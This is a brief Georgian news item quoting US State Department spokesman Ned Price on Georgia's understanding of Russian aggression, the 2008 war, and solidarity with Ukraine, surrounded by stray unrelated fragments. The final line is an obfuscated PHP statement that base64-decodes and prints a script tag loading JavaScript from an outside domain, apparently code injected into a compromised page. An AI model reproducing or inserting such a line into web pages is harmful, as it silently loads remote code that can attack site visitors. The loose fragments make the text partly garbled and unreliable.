celsiusi
ავერსი შნაიდერი
ის სავარაუდო შედეგი, რაც შეიძლება მოჰყვეს რუსეთის აგრესიას, ძალიან ცოტა ქვეყანას თუ ესმის ისე, როგორც ეს ესმით საქართველოში, - ამის შესახებ აშშ-ის სახელმწიფო დეპარტამენტის პრესსპიკერმა, ნედ პრაისმა "მთავარი არხის" ჟურნალისტის, დემნა დევდარიანის შეკითხვის საპასუხოდ სახდეპში გამართულ პრესკონფერენციაზე ისაუბრა. 
 
ის სავარაუდო შედეგი, რაც შეიძლება მოჰყვეს რუსეთის აგრესიას, ძალიან ცოტა ქვეყანას თუ ესმის ისე, როგორც ეს ესმით საქართველოში... ეს ის ქვეყანაა, რომელიც 2008 წელს თავად გახდა რუსეთის დაპყრობითი ომის მსხვერპლი. და ძალიან ბევრ ქართველს, ძალიან მკაფიოდ ახსოვს ეს ყველაფერი. მე შემიძლია წარმოვიდგინო, რომ ქართველები, მათ შორის მთავრობის წევრებიც და უბრალოდ ადამიანებიც, უკრაინის სოლიდარულები არიან..., - ამბობს პრაისი.
 
მისივე თქმით, პრინციპები, რომლებიც რუსეთმა 2008 წელს საქართველოში შეჭრით დაარღვია, იგივეა, რასაც დღეს, უკრაინის შემთხვევაში არღვევს. 
915
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");